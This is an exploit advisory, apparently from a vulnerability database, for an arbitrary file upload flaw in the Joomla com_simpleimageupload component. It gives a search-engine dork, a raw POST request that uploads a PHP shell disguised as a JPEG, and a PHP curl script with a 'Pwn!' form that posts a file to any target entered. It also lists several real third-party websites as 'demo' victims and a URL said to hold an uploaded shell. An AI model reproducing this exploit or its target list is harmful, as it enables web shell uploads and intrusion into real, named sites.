Joomla com_simpleimageupload Image Upload - Arbitrary File Upload

2016.04.11
Credit: Hacker Khan
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:option=com_simpleimageupload

# Exploit Title: Joomla Image Upload - Arbitrary File Upload # We Are Iranian Anonymous Iranonymous.org # Discovered By: Hacker Khan # Google Dork: inurl:option= # Vendor Homepage: http://tuts4you.de/ # Software Link: http://tuts4you.de/96-development/156-simpleimageupload # Version: 1.0 # Tested on:Win32 # Vuln Same to Com_Media Vulnerability ########################## POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc ########################### tamper data Host:127.0.0.1 User-Agent=Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0 Accept=text/html/php,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=en-US,en;q=0.5 Accept-Encoding=gzip, deflate Cookie=92e1ffe3bb23e8a366ff65194917235e=15168f4d2be2ab52b9730a55b4674ae5 Connection=keep-alive Content-Type=multipart/form-data; boundary=---------------------------281102171512373 Content-Length=49328 POSTDATA =-----------------------------281102171512373 Content-Disposition: form-data; name="Filedata"; filename="Neme fail.php" Content-Type: image/jpeg -----------------------------281102171512373 Content-Disposition: form-data; name="return-url" aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWpmb3JtX2FydGljbGV0ZXh0 -----------------------------281102171512373-- your Fail neme shell. http://www.bonyadtabari.ir//images/pic/neme fail.php ######################################### # Exploit : <?php echo '<form action="#" method="post" enctype="multipart/form-data"> <input type="text" name="target" value="www.localhost.com" /><input type="submit" name="Pwn" value="Pwn!" /> </form>'; if($_POST) { $target = $_POST['target']; $file = "0wn3d ! ;)"; $header = array("Content-Type: application/x-php", "Content-Disposition: form-data; name="Filedata"; file="L0v3.php.""); $ch = curl_init("http://".$target."/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36"); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$file", "return-url" => "aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=",)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $result = curl_exec($ch); curl_close($ch); print "$result"; } else { die(); } ?> ######################################### Demo: http://dartmoorscenictours.co.uk/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_text http://www.khamphoempittaya.ac.th/en/?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_content http://www.smarterhomesolutions.net/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_text http://www.agescirimini.it/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=comment ######################################## [+] Thanks to : MR.Khatar |||| ll_azab-siyah_ll || Rising || Sh@d0w || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D [+] Happy Boy || Blackwolf_Iran || MR.zarvan || Security Soldier || InfernaL And All Of Iranian Anonymous


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top